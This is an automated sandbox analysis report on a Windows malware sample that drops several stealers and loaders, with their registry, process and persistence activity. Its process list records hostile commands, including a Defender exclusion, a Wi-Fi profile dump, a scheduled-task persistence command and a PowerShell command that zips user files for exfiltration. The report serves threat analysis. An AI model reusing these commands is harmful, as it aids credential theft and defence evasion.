Analysis Overview
SHA256
77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1
Threat Level: Known bad
The file 77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1 was found to be: Known bad.
Malicious Activity Summary
Windows security bypass
RisePro
Glupteba
Lumma Stealer
Detect ZGRat V1
RedLine payload
Glupteba payload
Amadey
ZGRat
Modifies firewall policy service
RedLine
Stealc
UAC bypass
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Modifies Windows Firewall
Blocklisted process makes network request
Stops running service(s)
Reads user/profile data of web browsers
Reads WinSCP keys stored on the system
Executes dropped EXE
Reads local data of messenger clients
Identifies Wine through registry keys
Themida packer
Windows security modification
Checks computer location settings
Loads dropped DLL
Checks BIOS information in registry
Reads data files stored by FTP clients
Checks whether UAC is enabled
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Enumerates connected drives
Checks installed software on the system
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in System32 directory
Launches sc.exe
Drops file in Program Files directory
Drops file in Windows directory
Checks for VirtualBox DLLs, possible anti-VM trick
Unsigned PE
Program crash
Enumerates physical storage devices
System policy modification
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Checks processor information in registry
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious behavior: MapViewOfSection
Checks SCSI registry key(s)
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Creates scheduled task(s)
Modifies data under HKEY_USERS
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies system certificate store
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-04-25 14:40
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-25 14:40
Reported
2024-04-25 14:42
Platform
win10v2004-20240226-en
Max time kernel
43s
Max time network
156s
Command Line
Signatures
Amadey
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Lumma Stealer
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
Stealc
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1000014001\e902973543.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
Downloads MZ/PE file
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000014001\e902973543.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000014001\e902973543.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\1000013002\611b2ae010.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| N/A | N/A | C:\Users\Admin\1000013002\611b2ae010.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000014001\e902973543.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1000014001\e902973543.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\611b2ae010.exe = "C:\\Users\\Admin\\1000013002\\611b2ae010.exe" | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e902973543.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000014001\\e902973543.exe" | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000014001\e902973543.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5312 set thread context of 5716 | N/A | C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 5440 set thread context of 5980 | N/A | C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\explorta.job | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| File created | C:\Windows\Tasks\chrosha.job | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133585296532696232" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{B622DF68-10F4-491A-A0EC-30A314A16EE1} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe
"C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe"
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe
"C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe"
C:\Users\Admin\1000013002\611b2ae010.exe
"C:\Users\Admin\1000013002\611b2ae010.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffd770b9758,0x7ffd770b9768,0x7ffd770b9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1820 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2248 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3184 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3216 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4560 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\1000014001\e902973543.exe
"C:\Users\Admin\AppData\Local\Temp\1000014001\e902973543.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4840 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4816 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5028 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5484 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5276 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5312 -ip 5312
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5440 -ip 5440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5312 -s 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 352
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6080 -ip 6080
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6080 -s 356
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=748 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\808065738166_Desktop.zip' -CompressionLevel Optimal
C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"
C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe
"C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe" -Force
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installg.bat" "
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
C:\Windows\SysWOW64\sc.exe
Sc delete GameServerClient
C:\Users\Admin\Pictures\K9EzU2hxB6e4QfvrMT7LnkFP.exe
"C:\Users\Admin\Pictures\K9EzU2hxB6e4QfvrMT7LnkFP.exe"
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService remove GameServerClient confirm
C:\Users\Admin\Pictures\dvziYrHzjJaIGccJldIN1TNj.exe
"C:\Users\Admin\Pictures\dvziYrHzjJaIGccJldIN1TNj.exe"
C:\Users\Admin\Pictures\S6gQXYO26TJ29VBYykARgxl8.exe
"C:\Users\Admin\Pictures\S6gQXYO26TJ29VBYykARgxl8.exe"
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService install GameServerClient "C:\Program Files (x86)\GameServerClient\GameServerClient.exe"
C:\Users\Admin\AppData\Local\Temp\u53k.0.exe
"C:\Users\Admin\AppData\Local\Temp\u53k.0.exe"
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService start GameServerClient
C:\Program Files (x86)\GameServerClient\GameService.exe
"C:\Program Files (x86)\GameServerClient\GameService.exe"
C:\Users\Admin\Pictures\x1QvVUZFYeu0W5aS8JUXZFtT.exe
"C:\Users\Admin\Pictures\x1QvVUZFYeu0W5aS8JUXZFtT.exe" --silent --allusers=0
C:\Users\Admin\Pictures\AUOJwzWUhuXoDRZSwm4I8Gsd.exe
"C:\Users\Admin\Pictures\AUOJwzWUhuXoDRZSwm4I8Gsd.exe"
C:\Users\Admin\Pictures\x1QvVUZFYeu0W5aS8JUXZFtT.exe
C:\Users\Admin\Pictures\x1QvVUZFYeu0W5aS8JUXZFtT.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x29c,0x2a0,0x2a4,0x274,0x2a8,0x6c42e1d0,0x6c42e1dc,0x6c42e1e8
C:\Users\Admin\AppData\Local\Temp\u53k.2\run.exe
"C:\Users\Admin\AppData\Local\Temp\u53k.2\run.exe"
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\x1QvVUZFYeu0W5aS8JUXZFtT.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\x1QvVUZFYeu0W5aS8JUXZFtT.exe" --version
C:\Users\Admin\Pictures\x1QvVUZFYeu0W5aS8JUXZFtT.exe
"C:\Users\Admin\Pictures\x1QvVUZFYeu0W5aS8JUXZFtT.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=6740 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240425144159" --session-guid=f4cbfaa2-6eaf-471f-8e79-eb81698f826c 